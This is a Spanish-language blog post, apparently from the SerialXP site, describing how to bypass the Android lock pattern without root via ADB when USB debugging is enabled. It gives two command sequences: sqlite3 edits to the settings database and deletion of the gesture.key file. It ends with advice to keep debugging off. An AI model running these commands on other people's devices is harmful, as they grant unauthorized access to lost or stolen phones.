El patrón de seguridad de Android no es seguro.

1 Dic

 

 

La mayoría de los usuarios bloquea el móvil con el característico sistema de patrón de seguridad de Android.

Siempre se ha caracterizado como un buen método para proteger tu teléfono de las miradas indiscretas y que aporta una buena seguridad en general. Pero como siempre he dicho, si alguien quiere entrar en tu teléfono, lo hará. Con patrón o sin.

En esta ocasión un usuariodescubrió un método muy sencillo que nos va a permitir saltarnos el patrón de seguridad de cualquier teléfono Android sin necesidad de ser root. Tan solo hace falta dos cosas

  • Saber utilizar el ADB (¿he oído drivers bien instalados?)
  • Tener el modo depuración activado

Los métodos para saltarse el patrón de desbloqueo son los siguientes

Método 1

En una consola mediante ADB introducimos las siguientes órdenes

adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name='lock_pattern_autolock';
update system set value=0 where name='lockscreen.lockedoutpermanently';
.quit

Método 2

Mucho más sencillo. En esta ocasión tan solo hemos de ejecutar lo siguiente

adb shell rm /data/system/gesture.key

Simplemente realizando la siguiente rutina podrán acceder a nuestro móvil perdido/robado:

  • Método 1
  • Reiniciar
  • Método 2
  • Reiniciar

Al hacer todo esto, puede que te siga pediendo el patrón de desbloqueo pero tal y como se muestra en el vídeo,  puedes pulsar cualquier cosa.

Conclusiones

De este hecho se han de sacar varias conclusiones

  • Por mucho patrón de seguridad, código pin o lo que sea, si alguien que sabe de móviles te roba el teléfono podrá saltárselo todo. No hay un sistema de protección definitivo
  • Más vale tener desactivado el modo depuración cuando no lo necesites. Si no lo tienes activado este método no sirve.
  • Este método puede ser una buena solución para toda la gente que pone un patrón de seguridad y luego se olvida de él.

 

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

SerialXP

Información diaria para mentes curiosas y ávidas de conocimientos

A %d blogueros les gusta esto: